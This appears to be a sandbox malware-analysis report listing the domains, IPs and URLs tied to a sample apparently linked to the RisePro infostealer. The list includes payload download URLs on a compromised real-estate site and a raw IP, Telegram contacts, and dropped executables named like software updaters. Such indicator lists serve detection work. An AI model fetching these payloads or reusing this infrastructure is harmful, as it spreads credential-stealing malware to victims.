                        https://easy2buy.ae/general-guidance-on-living-in-dubai/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/upgrade/k.exexe100%Avira URL Cloudmalware
                        https://easy2buy.ae/blog/0%Avira URL Cloudsafe
                        https://easy2buy.ae/resale-of-the-apartment/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme100%Avira URL Cloudmalware
                        https://easy2buy.ae/#organization0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.20%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ipinfo.io
                        		34.117.186.192
                        		truefalse
                          		high
                          easy2buy.ae
                          		185.199.220.53
                          		truefalseunknown
                          db-ip.com
                          		172.67.75.166
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://easy2buy.ae/wp-content/upgrade/k.exefalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            https://db-ip.com/demo/home.php?s=81.181.60.11false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                		high
                                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                  		high
                                  https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.j$file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.csfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/upgrade/k.exeYfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assetsfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae:80/wp-content/upgrade/k.exefile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 5%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://easy2buy.ae/wp-admin/admin-ajax.phpfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://easy2buy.ae/property-management-and-letting/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://t.me/risepro_botRomaniafile.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://t.me/risepro_botisepro_bot0file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://easy2buy.ae/contact/EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://easy2buy.ae/#/schema/logo/image/EdgeMS2.exe.0.drfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://embed.tawk.to/64c7994d94cf5d49dc678105/1h6lqtm4gfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        		high
                                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?vefile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://easy2buy.ae/services/file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://easy2buy.ae/feed/file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://easy2buy.ae/xmlrpc.php?rsdfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://easy2buy.ae:80/ntControlSetfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://193.233.132.175/server/k/l2.exerCAfile.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://calendly.com/prokopf/online-consultationEdgeMS2.exe.0.drfalse
                                          		high
                                          https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-content/uploads/2023/06/logo.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.fullfile.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • 4%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?vefile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllfile.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                              		high
                                              https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.pngfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.csfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://t.me/RiseProSUPPORTfile.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, _LQmmrlytjrHiMTfplY7yVS.zip.0.drfalse
                                                		high
                                                https://easy2buy.ae/about/EdgeMS2.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://schema.orgfile.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                  		high
                                                  https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drfalse
                                                    		high
                                                    https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brD87fZN3R3jFeplaces.sqlite.0.drfalse
                                                      		high
                                                      https://easy2buy.ae/arranging-residential-visa/EdgeMS2.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://gmpg.org/xfn/11file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        		high
                                                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcfile.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://easy2buy.aeEdgeMS2.exe.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
